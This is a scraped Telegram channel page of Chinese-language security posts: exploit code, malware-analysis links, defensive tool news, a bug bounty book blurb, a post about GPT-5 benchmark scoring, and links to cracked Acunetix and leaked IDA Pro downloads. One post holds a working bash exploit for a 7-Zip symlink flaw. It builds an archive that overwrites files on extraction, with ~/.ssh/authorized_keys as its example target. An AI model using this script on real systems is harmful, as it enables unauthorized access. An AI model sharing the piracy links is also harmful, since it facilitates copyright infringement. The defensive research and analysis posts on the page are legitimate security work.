信息安全渗透攻防漏洞分享

Open in Telegram

信息安全渗透测试计算机网络安全攻防技术漏洞分析研究黑客资料分享

China78 123 Technologies & Applications42 778

947

Subscribers

+224 hours

+137 days

+2330 days

258

Post views

~ 7224 hours

~ 9348 hours

27.27%

Engagement rate

No data

Posts per day

Ads index

beta

Posts Archive

947

TG必备的搜索引擎，极搜帮你精准找到，想要的群组、频道、音乐、视频 👇👇👇点击下方按钮，进行搜索

947

#漏洞利用 #winrar #CVE-2025-55188 #7-zip 符号链接任意文件符号链接任意文件 7-Zip至25.01。该漏洞是由于7-Zip在提取过程中不正确地处理SIM链接，从而允许创建的存档覆盖系统中的文件而导致的。

#!/bin/bash
if [ "$#" -ne 3 ]; then
    echo "Usage: $0 <payload_file> <target_symlink_path> <output_archive>"
    echo "Example: $0 mykey.pub ../../.ssh/authorized_keys exploit.7z"
    exit 1
fi

PAYLOAD="$1"
TARGET="$2"
OUT="$3"

WORKDIR=$(mktemp -d)
ln -s "$TARGET" "$WORKDIR/symlink"
cp "$PAYLOAD" "$WORKDIR/symlink"

tar --sort=name -cf "$WORKDIR/exploit.tar" -C "$WORKDIR" symlink
7z a "$OUT" "$WORKDIR/exploit.tar" >/dev/null

echo "[*] Exploit archive created: $OUT"
rm -rf "$WORKDIR"

947

#AI #openai #人工智能 GPT-5发布才几天，就被曝出在编程能力测试中“动了手脚”。有开发者发现，OpenAI号称用SWE-bench Verified基准评测，实际只用了477道题，把原本的500题悄悄删掉了23道。要是把这23道题算成零分，GPT-5的得分可能还不如Claude Opus 4.1——而且两者的差距本来也就0.4%，几乎是贴身肉搏。这事让不少人笑了出来：“不会的题就删掉”、“会的都会了，不会的做了也没用”——这理由要是放在考试里，估计直接被监考老师请出去了。有人甚至调侃OpenAI学上了华为那一套“内部成绩优化”，还有人感叹，这种小动作反而会影响外界对评测的信任。补充一下，closeai 以前也是只用477个，并不是专为 GPT5。发布 o1 的时候是怎么解释的： “GPT-4o numbers are from the SWE-bench Verified blog post on the full 500 subset. Due to systems issues, other models are evaluated on an n=477 subset.” 来源： https://x.com/deedydas/status/1953855509078872202?t=X9HyEXIP-t1A-dA08KvO_g&s=19 https://cdn.openai.com/o1-system-card.pdf

947

TG必备的搜索引擎，极搜帮你精准找到，想要的群组、频道、音乐、视频 👇👇👇点击下方按钮，进行搜索

947

#恶意软件分析 1. DarkCloud 窃取工具 https://unit42.paloaltonetworks.com/new-darkcloud-stealer-infection-chain 2. SoupDealer - 隐形 Java 加载器 https://www.malwation.com/blog/technical-analysis-of-a-stealth-java-loader-used-in-phishing-campaigns-targeting-turkiye 3. PyLangGhost 远控木马 https://any.run/cybersecurity-blog/pylangghost-malware-analysis 4. Efimer 木马 https://securelist.com/efimer-trojan/117148 5. CastleBot 恶意软件即服务 https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation

947

#AI #人工智能 #漏洞挖掘 #网络安全 #漏洞响应 #白帽黑客 #演讲 #奇安信 #补天 #技术分享围绕如何利用人工智能技术来辅助安全研究人员进行漏洞挖掘和分析，从而提升漏洞响应的效率和准确性。这份文档对于对AI在网络安全领域的应用、漏洞挖掘技术以及安全研究感兴趣的专业人士和爱好者来说，具有重要的参考价值。

947

TG必备的搜索引擎，极搜帮你精准找到，想要的群组、频道、音乐、视频 👇👇👇点击下方按钮，进行搜索

947

#BugBounty #渗透测试 #网络安全 #漏洞挖掘 #白帽黑客 #信息安全 #网络攻防 #安全测试 #漏洞赏金 #安全研究 CN：《Bug Bounty from Scratch》是一部全面介绍漏洞赏金（Bug Bounty）从入门到进阶的实战指南，涵盖了漏洞赏金平台运作机制、常见漏洞类型、安全测试方法、工具使用、报告撰写技巧以及与安全团队沟通的最佳实践。作者结合多年国际红队与渗透测试经验，通过真实案例与技巧分享，帮助读者快速掌握从信息收集到漏洞利用再到报告提交的完整流程，适合网络安全爱好者、渗透测试工程师及白帽黑客阅读。 EN：Bug Bounty from Scratch is a comprehensive practical guide for learning bug bounty hunting from the ground up, covering how bug bounty platforms work, common vulnerabilities, penetration testing methodologies, essential tools, vulnerability reporting, and effective communication with security teams. Written by an experienced red team leader and penetration tester, the book provides real-world examples, advanced techniques, and best practices to help readers develop the skills needed to find and responsibly disclose security flaws. Perfect for cybersecurity enthusiasts, pentesters, and ethical hackers.

947

TG必备的搜索引擎，极搜帮你精准找到，想要的群组、频道、音乐、视频 👇👇👇点击下方按钮，进行搜索

947

#AI #人工智能 #漏洞挖掘 #网络安全 #漏洞响应 #白帽黑客 #演讲 #奇安信 #补天 #技术分享奇安信旗下的补天漏洞响应平台在W22天白帽黑客城市沙龙（杭州站）上的一次演讲材料。文章围绕如何利用人工智能技术来辅助安全研究人员进行漏洞挖掘和分析，从而提升漏洞响应的效率和准确性。这份文档对于对AI在网络安全领域的应用、漏洞挖掘技术以及安全研究感兴趣的专业人士和爱好者来说，具有重要的参考价值。

947

TG必备的搜索引擎，极搜帮你精准找到，想要的群组、频道、音乐、视频 👇👇👇点击下方按钮，进行搜索

947

#工具 #AppSec 通过静态类型阻止反序列化攻击 https://github.com/columbia/quack // 通过修复反序列化 API 调用来自动保护应用程序的框架

947

Repost from CyberSecurityTechnologies

#tools #AppSec Black Hat USA 2025: "QUACK: Hindering Deserialization Attacks via Static Duck Typing", 2025. ]-> https://github.com/columbia/quack // framework for automatically protecting applications by fixing calls to deserialization APIs

947

#Ai #安全 #Ai研究人工智能批判研究手册

947

TG必备的搜索引擎，极搜帮你精准找到，想要的群组、频道、音乐、视频 👇👇👇点击下方按钮，进行搜索

947

#网络安全 #漏洞 https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-8j63-96wh-wh3j

947

#红队战术 #蓝队技术 #紫队练习 2025年美国黑帽大会： “我现在就在你的日志里，欺骗你的分析师，蒙蔽你的EDR”。全面的ETW事件生成工具 https://github.com/olafhartong/BamboozlEDR

947

TG必备的搜索引擎，极搜帮你精准找到，想要的群组、频道、音乐、视频 👇👇👇点击下方按钮，进行搜索

947

#Acunetix #渗透测试工具 #Web漏洞扫描 #安全工具分享 #网络安全 #Windows工具 Acunetix v25.5.250613157 - 17 Jun 2025 Windows: https://pwn3rzs.co/scanner_web/acunetix/Acunetix-v25.5.250613157-Windows-Pwn3rzs-CyberArsenal.rar Linux: [No installer leaked, yet] Password: Pwn3rzs Changelog: Too long for a post, refer here: https://www.acunetix.com/changelogs/acunetix-premium/v25-5-0-17-june-2025/

947

IDA Pro 9.2 Beta 2 Windows source: http://xjepeflts2qwhqb77bw5vj6xguve56rpyeoxibztd7t7fehxxowt5fad.onion/9.2/, https://bbs.kanxue.com/thread-287796.htm, https://www.52pojie.cn/thread-2049414-1-1.html

$ sha256sum *
894fca47a5f0f9f7a0790013073dbaf38a50540ae9c336533f3ebb5a0bf27280  ida-pro_92_x64win.exe

VT: https://www.virustotal.com/gui/file/894fca47a5f0f9f7a0790013073dbaf38a50540ae9c336533f3ebb5a0bf27280/details (signed by Hex-Rays) same keygen